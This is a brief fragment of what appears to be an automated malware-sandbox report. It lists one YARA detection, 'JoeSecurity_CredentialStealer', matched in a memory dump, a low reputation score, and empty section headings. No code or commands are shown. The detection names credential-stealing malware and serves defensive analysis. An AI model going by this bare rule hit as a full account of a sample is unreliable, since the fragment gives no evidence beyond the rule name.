                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Disassembly

                                            Code Analysis

                                            Reset < >